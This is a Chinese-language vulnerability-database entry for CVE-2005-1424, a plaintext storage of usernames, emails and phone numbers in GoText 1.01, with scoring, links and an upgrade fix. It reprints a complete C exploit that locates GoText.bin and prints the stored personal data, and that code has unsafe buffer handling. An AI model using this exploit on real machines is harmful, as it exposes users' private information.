CVE-2005-1424
CVSS2.1
发布时间 :2005-05-03 00:00:00
修订时间 :2008-09-05 16:49:06
NMCOE    

[原文]StumbleInside GoText 1.01 stores sensitive username, mail address,and phone number information in plaintext in the GoText.bin file, which allows local users to obtain that information.


[CNNVD]GoText本地信息泄露漏洞(CNNVD-200505-832)

        StumbleInside GoText 1.01在GoText.bin文件中以纯文本形式存储敏感的用户名、邮件地址和电话号码信息,本地用户可以借此获取这些信息。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1424
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1424
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-832
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/20315
(UNKNOWN)  XF  gotext-user-information-disclosure(20315)
http://www.securityfocus.com/bid/13443
(UNKNOWN)  BID  13443
http://www.osvdb.org/14686
(VENDOR_ADVISORY)  OSVDB  14686
http://securitytracker.com/id?1013825
(UNKNOWN)  SECTRACK  1013825

- 漏洞信息

GoText本地信息泄露漏洞
低危 设计错误
2005-05-03 00:00:00 2005-10-20 00:00:00
本地  
        StumbleInside GoText 1.01在GoText.bin文件中以纯文本形式存储敏感的用户名、邮件地址和电话号码信息,本地用户可以借此获取这些信息。

- 公告与补丁

        暂无数据

- 漏洞信息 (963)

GoText 1.01 Local User Informations Disclosure Exploit (EDBID:963)
windows local
2005-04-28 Verified
0 Kozan
N/A [点击下载]
/*******************************************************************

GoText 1.01 Local User Informations Disclosure Exploit by Kozan

Application: GoText 1.01
Vendor: StumbleInside Software - www.stumbleinside.com
Vulnerable Description: GoText 1.01 discloses user informations
to local users.


Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");

if( di == NULL )
{
fclose(di);
return -1;
}

while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}


char *oku(char *FilePath,char *Str)
{

FILE *di;
char cr;
int i=0;
char Feature[500];

int Offset = adresal(FilePath,Str);

if( Offset == -1 )
return "";

if( (di=fopen(FilePath,"rb")) == NULL )
return "";

fseek(di,Offset+strlen(Str),SEEK_SET);

while(!feof(di))
{
cr=getc(di);
if(cr == 0x0D)
break;
Feature[i] = cr;
i++;
}

Feature[i] = '\0';
fclose(di);
return Feature;
}


int main()
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",0,KEY_QUERY_VALUE,&hKey)
== ERROR_SUCCESS)
	{

		lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);

		if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
		{
			RegCloseKey(hKey);
			printf("An error occured!\n");
			exit(1);
		}

		RegCloseKey(hKey);

	}
	else
	{
		RegCloseKey(hKey);
		printf("An error occured!\n");
		exit(1);
	}

	strcat(prgfiles,"\\GoText\\GoText.bin");

	printf("GoText 1.01 Local User Informations Disclosure Exploit by Kozan\n");
	printf("Credits to ATmaCA\n");
	printf("www.netmagister.com - www.spyinstructors.com \n");
	printf("kozan@netmagister.com \n\n");

	char UserName[BUFSIZE], MailAddress[BUFSIZE], PhoneNumber[BUFSIZE];

	strcpy(UserName,oku(prgfiles,"MyName="));
	strcpy(MailAddress,oku(prgfiles,"MyEmail="));
	strcpy(PhoneNumber,oku(prgfiles,"MyNumber="));

	printf("User Name    : %s\n",UserName);
	printf("Mail Address : %s\n",MailAddress);
	printf("Phone Number : %s\n",PhoneNumber);

	return 0;
}

// milw0rm.com [2005-04-28]
		

- 漏洞信息

14686
GoText GoText.bin User Information Local Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

GoText contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a local user accesses the "ProgramFiles\GoText\GoText.bin" plain text file, which will disclose username and password information about application users, resulting in a loss of confidentiality.

- 时间线

2005-04-27 Unknow
2005-04-27 Unknow

- 解决方案

Upgrade to version 1.02 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站